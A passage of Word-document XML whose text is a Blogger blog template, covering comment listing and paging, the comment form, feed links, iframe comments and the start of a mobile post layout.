        <w:t xml:space="preserve">                                                &lt;span class='paging-control-container'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:if cond='data:post.hasOlderLinks'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'&gt;&lt;data:post.oldestLinkText/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &amp;#160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'&gt;&lt;data:post.olderLinkText/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &amp;#160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;data:post.commentRangeText/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:if cond='data:post.hasNewerLinks'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &amp;#160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'&gt;&lt;data:post.newerLinkText/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &amp;#160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'&gt;&lt;data:post.newestLinkText/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div expr:id='data:widget.instanceId + &amp;quot;_comments-block-wrapper&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;dl expr:class='data:post.avatarIndentClass' id='comments-block'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:loop values='data:post.comments' var='comment'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;dt expr:class='&amp;quot;comment-author &amp;quot; + data:comment.authorClass' expr:id='data:comment.anchorName'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;b:if cond='data:comment.favicon'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;img expr:src='data:comment.favicon' height='16px' style='margin-bottom:-2px;' width='16px'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;a expr:name='data:comment.anchorName'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;b:if cond='data:blog.enabledCommentProfileImages'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;data:comment.authorAvatarImage/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;b:if cond='data:comment.authorUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;a expr:href='data:comment.authorUrl' rel='nofollow'&gt;&lt;data:comment.author/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;data:comment.author/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;data:commentPostedByMsg/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/dt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;dd class='comment-body' expr:id='data:widget.instanceId + data:comment.cmtBodyIdPostfix'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;b:if cond='data:comment.isDeleted'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;span class='deleted-comment'&gt;&lt;data:comment.body/&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                        &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;data:comment.body/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/dd&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;dd class='comment-footer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;span class='comment-timestamp'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;a expr:href='data:comment.url' title='comment permalink'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                          &lt;data:comment.timestamp/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                        &lt;b:include data='comment' name='commentDeleteIcon'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                      &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;/dd&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/dl&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:if cond='data:post.commentPagingRequired'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;span class='paging-control-container'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;data:post.oldestLinkText/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;data:post.olderLinkText/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &amp;#160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                  &lt;data:post.commentRangeText/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &amp;#160;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;data:post.newerLinkText/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;data:post.newestLinkText/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;p class='comment-footer'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:if cond='data:post.embedCommentForm'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:if cond='data:post.allowNewComments'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;b:include data='post' name='comment-form'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;b:else/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                    &lt;data:post.noNewCommentsText/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;b:elseif cond='data:post.allowComments'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                  &lt;a expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'&gt;&lt;data:postCommentMsg/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:showCmtPopup'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div id='comment-popup'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                                &lt;iframe allowtransparency='true' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div id='backlinks-container'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div expr:id='data:widget.instanceId + &amp;quot;_backlinks-container&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:include cond='data:post.showBacklinks' data='post' name='backlinks'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='feedLinks'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='data:blog.pageType != &amp;quot;item&amp;quot;'&gt; &lt;!-- Blog feed links --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:feedLinks'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;div class='blog-feeds'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:include data='feedLinks' name='feedLinksBody'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:else/&gt; &lt;!--Post feed links --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='post-feeds'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;b:loop values='data:posts' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                                &lt;b:include cond='data:post.allowComments and data:post.feedLinks' data='post.feedLinks' name='feedLinksBody'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='feedLinksBody' var='links'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='feed-links'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;data:feedLinksMsg/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:loop values='data:links' var='f'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a class='feed-link' expr:href='data:f.url' expr:type='data:f.mimeType' target='_blank'&gt;&lt;data:f.name/&gt; (&lt;data:f.feedType/&gt;)&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:loop&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='iframe_comments' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;b:if cond='data:post.allowIframeComments'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;script expr:src='data:post.iframeCommentSrc' type='text/javascript'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;div class='cmt_iframe_holder' expr:data-href='data:post.url.canonical' expr:data-viewtype='data:post.viewType'/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;b:if cond='data:post.embedCommentForm == &amp;quot;false&amp;quot;'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                              &lt;a expr:href='data:post.addCommentUrl' expr:onclick='data:post.addCommentOnclick'&gt;&lt;data:postCommentMsg/&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                            &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;/b:includable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        &lt;b:includable id='mobile-index-post' var='post'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          &lt;div class='mobile-date-outer date-outer'&gt;</w:t>
      </w:r>
